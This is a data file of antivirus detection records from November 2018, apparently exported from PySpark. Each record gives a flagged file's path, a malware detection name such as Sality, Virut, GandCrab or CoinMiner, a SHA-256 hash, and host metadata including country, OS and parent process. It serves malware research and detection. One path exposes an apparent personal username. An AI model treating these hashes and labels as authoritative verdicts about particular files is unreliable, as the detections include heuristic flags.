  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T17:49:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T17:16:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d9bc', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d9bc', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:27:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='abd1d58e8ee812d7e64c49905a511315a2470ff0', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\abd1d58e8ee812d7e64c49905a511315a2470ff0', filesize=320000, name='Adware/DealPly.196e8f.#M1.#R1'), hash='196e8f88420f9401f3192cfa7a214d19d4c1dbc8715ec51261bff5737f5b48db', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:10:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rdpclip.exe', filepath='\\\\?\\C:\\Windows\\system32\\rdpclip.EXE', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='86598d7bba12a8f6dcc489d412c197db32d2a0c8350845e8aa500807aa8c58ee', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:30:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files\\Windows Msn\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:29:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163825-a8108604', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a15e736\\AVSCAN-20181104-163712-A14B6B69\\AVSCAN-20181104-163825-A8108604', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:38:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154417-388d18e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-154400-3661B388\\AVSCAN-20181104-154417-388D18E3', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201747-516212aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_807dca02\\AVSCAN-20181104-201507-40A0149C\\AVSCAN-20181104-201747-516212AA', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:17:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200617-124765ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200617-124765CE', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:06:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dtsu2pausrv32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Audio_wnt6-x86_1111\\drp\\x86\\S\\Realtek\\2\\DTSU2PAuSrv32.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='9747165e934ea35cceeff9e433b43095b25b52a5842a96643eaba52e88b70fc0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T04:58:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='_isdel.exe', filepath='C:\\CIMCO.old\\DNCMax7\\Utils\\Ipc-das-i7000\\_ISDel.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='dbe6256828aaab5d3b0dc7fbc48950dab85a8733aa14b2562740f418a52d6a97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:04:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204030-f1b3c603', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ddb9b33\\AVSCAN-20181104-203828-E37C3A01\\AVSCAN-20181104-204030-F1B3C603', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:40:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016 (2).exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016 (2).exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T02:03:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145131-cc8d4aa6', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b89e992\\AVSCAN-20181104-144427-80344E91\\AVSCAN-20181104-145131-CC8D4AA6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:53:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Users\\X\\Desktop\\Vimal\\EGR PACKAGE\\egr1.5.5\\crack\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='TT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:11:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adobeflashplayer__286ab2t52lp427.exe', filepath='C:\\Users\\X\\Downloads\\AdobeFlashPlayer__286ab2t52lp427.exe', filesize=2688000, name='W32/Virut.Gen.#M1.#R1'), hash='d75a85f9ded80c69320d2b301fef287a648268c894b469ed42217523ce13696d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T12:46:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125712-36ac83c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_613104b7\\AVSCAN-20181104-125452-2406B856\\AVSCAN-20181104-125712-36AC83C3', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:57:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='simms.vir', filepath='C:\\Program Files (x86)\\Bolshevism\\simms.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='2308f6cbca6e4919b6b50d3e3952464aee5e99967a2e8e3f2d44ef88286b34ec', metadata=Row(cmdline='-k WerSvcGroup', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T03:18:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151703-1f7b5e49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-151703-1F7B5E49', filesize=640000, name='TR/AD.NetWiredRc.hrjcx.#M1.#R1'), hash='6a7a47bd21a3ad8ef62f944550200118f797c909eee32087f2005f096340bc19', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:47:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outils implantation apc.exe', filepath='G:\\OUTILS IMPLANTATION APC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-04T08:52:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000ff6a5', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000ff6a5', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110548-e3f43126', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110548-E3F43126', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='graphs.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\GRAPHS\\GRAPHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='fcacdeeecabea03fd1d2a9e924a85f96d0fed56f05c38b3f85fc7e84f222c600', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fact-pcgo-9808-2622.doc', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Outlook\\9SBPJ6VB\\FACT-PCGO-9808-2622.doc', filesize=80000, name='W97M/Agent.05081722.#M1.#R1'), hash='e59d0aee5b96f29c5840de42c1197cd1821e95ffdb43d092fecba31c514c103f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:06:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\taskeng.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='d46f58fdd8d6d8761158ce86213a79db317a2c20346d5f479ad5125563666197', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T01:48:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='servicemodelreg.exe', filepath='\\\\?\\F:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelReg.exe', filesize=312000, name='W32/Neshta.A.#M1.#R1'), hash='d9d622d75c3f7e212b633ad7edfffbc0716204f030f342eb9b11cdeaf8923492', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201314-02803772', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e186474e\\AVSCAN-20181102-200915-E44DB580\\AVSCAN-20181102-201314-02803772', filesize=3200000, name='HEUR/AGEN.1035084.#M1.#R1'), hash='df60313db2a35ef52b9925d233ee8036d349ccaec47fe4762ff48246b46846fb', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:12:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204647-67460538', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_092ca6dc\\AVSCAN-20181102-204624-632CF2B2\\AVSCAN-20181102-204647-67460538', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:46:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-040538-d35742ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-040538-D35742CE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='9653554c59f3a7a927926b6f783cde4e7f90afe22e988ab926b446d89384ce84', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134342-4158b2d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_438480b2\\AVSCAN-20181102-133820-162AD4C3\\AVSCAN-20181102-134342-4158B2D8', filesize=256000, name='TR/GandCrab.azw.#M1.#R1'), hash='be1266832073b4407deef4ee688b42074a40042b4a11e2eb61fc8a1ba42d0e98', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221510-5c56a300', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221427-55CFC5F3\\AVSCAN-20181102-221510-5C56A300', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201235-c03f61d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e165ac20\\AVSCAN-20181102-194201-60E5E25B\\AVSCAN-20181102-201235-C03F61D5', filesize=3708000, name='TR/Kryptik.abbojv.#M1.#R1'), hash='d784b484d999c72e67e0fe3efb0e46f14e0cb99e9b4cc21ab8c98513f3a386ca', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:12:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a207e1fadccabccb2c9c6148c7580f0a.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1683791883\\a207e1fadccabccb2c9c6148c7580f0a.smp', filesize=9000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='761b6dbffbf78c0ad8c36d257d2e0a22ac461f21e933e50cbcd8953189562f14', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-02T23:51:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f7996cca9b011e6fb21ab18a91c16ee4b5ed093bd4ab4c43c123fa3ae99d3fc2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\F7996CCA9B011E6FB21AB18A91C16EE4B5ED093BD4AB4C43C123FA3AE99D3FC2', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='f7996cca9b011e6fb21ab18a91c16ee4b5ed093bd4ab4c43c123fa3ae99d3fc2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qdooelez.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\QDoOElEZ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msouc.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSOUC.EXE', filesize=564000, name='W32/Sality.AT.#M1.#R1'), hash='77a1c6dc6bde606f8322220663496a4a3c060300e48210a7396a038351b301c3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:iL5kJYJ2NU6PJGn\\\\\\/.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:00:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='\\\\?\\C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='debit note  (xe 7cho tang cuong).exe', filepath='F:\\\xa0\\DEBIT NOTE  (xe 7cho tang cuong).exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='d8a87a3c588c86db85feeeba930fc0940c212e0937fcb010b1c3e8130d2ed5de', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152747-a86b0144', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_80c54e39\\AVSCAN-20181102-151549-22F1BB06\\AVSCAN-20181102-152747-A86B0144', filesize=64000, name='TR/BackDoor.CV.3.#M1.#R1'), hash='b4bac33b6dd84064af9ea04b295ca98f419f968f8eb377b9d34c13297f109066', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164139-e93e7277', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-163849-D5856EBF\\AVSCAN-20181102-164139-E93E7277', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:39:11Z'), dt=datetime.date(2018, 11, 2)),
